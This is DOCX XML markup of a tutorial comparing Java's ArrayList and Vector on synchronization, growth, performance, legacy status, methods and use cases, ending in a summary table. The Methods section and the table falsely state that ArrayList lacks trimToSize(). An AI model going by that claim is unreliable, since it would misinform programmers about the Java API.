    <w:p w14:paraId="6C52DE68" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Synchronization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B3278" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3BF4A5" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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t synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default. This means it is not thread-safe, so if multiple threads access an ArrayList concurrently and at least one thread modifies it, you must ensure external synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25299F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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tter performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded environments due to the lack of synchronization overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BA7DC6" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77D391" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ynchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by default, making it thread-safe. Multiple threads can access a Vector concurrently without causing data inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FC5C2F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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synchronization comes at the cost of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in single-threaded applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D69503E" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Growth Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3813D8" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5E1D95" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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Grows by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>50%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its current size when the array exceeds its capacity. For example, if the current capacity is 10, it will resize to 15 when it runs out of space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA1CE59" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975F16A" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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Grows by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100%</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of its current size by default. If the capacity is 10, it will resize to 20 when it runs out of space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB5B7B" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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 customize the growth factor when creating a Vector by providing a second argument to the constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB14DB5" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFEF24B" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A20368" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ypically has </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>better performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than Vector due to the lack of synchronization and smaller growth increments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636996A7" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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eferred choice in most cases when thread-safety is not a concern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C577D5" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06930731" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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ecause of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and larger growth increments, Vector is typically </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than ArrayList in single-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518789FD" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Legacy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C588AC" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50191F8D" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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rt of the modern Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (introduced in Java 1.2), and is the recommended choice for most use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDC41BB" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D29727" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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egacy class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (introduced in Java 1.0) and is considered somewhat outdated. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>old collection classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it is still part of the Java API for backward compatibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FD5C28" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C52BB9" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B0CBB" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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Does not have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capacity()</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trimToSize()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94486F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ABB6C0" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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as methods like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capacity()</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trimToSize()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide more control over the internal array and memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E90DC" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235808BD" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0353F2B6" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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d in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments where you need fast access and modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692DE7F" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79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ector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E98B1" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="79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d in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-threaded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environments where synchronization is required. However, due to the better alternatives (like CopyOnWriteArrayList or Collections.synchronizedList()), it is less commonly used now.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE46DA8" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="00F26C9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Summary of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3"/>
        <w:gridCol w:w="4358"/>
        <w:gridCol w:w="4268"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="086DFDDF" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524F9814" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="008417EE">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528A0D22" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="008417EE">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rrayList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1526B156" w14:textId="77777777" w:rsidR="00CC6960" w:rsidRPr="00CE4B95" w:rsidRDefault="00CC6960" w:rsidP="008417EE">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Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="54F59B70" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EB10E61"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ynchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69818C2F"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t synchronized (not thread-safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29EBC51C"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nchronized (thread-safe)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="2DB40866" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D58F07A"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Growth Factor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="080E5B87"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rows by 50% of the current size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29DA1067"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rows by 100% (doubling the capacity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="0C69318F" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB307BF"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="653D0A4B"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aster in single-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C0CC44"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lower due to synchronization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="0482FED5" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A9F014F"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egacy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0101FCAF"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art of the modern Collections framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="444775E7"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egacy class (older API, Java 1.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F26C9C" w:rsidRPr="00CE4B95" w14:paraId="3C1786FE" w14:textId="77777777" w:rsidTr="00CC6960">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3076DD23"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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0E648D"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capacity() or trimToSize()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
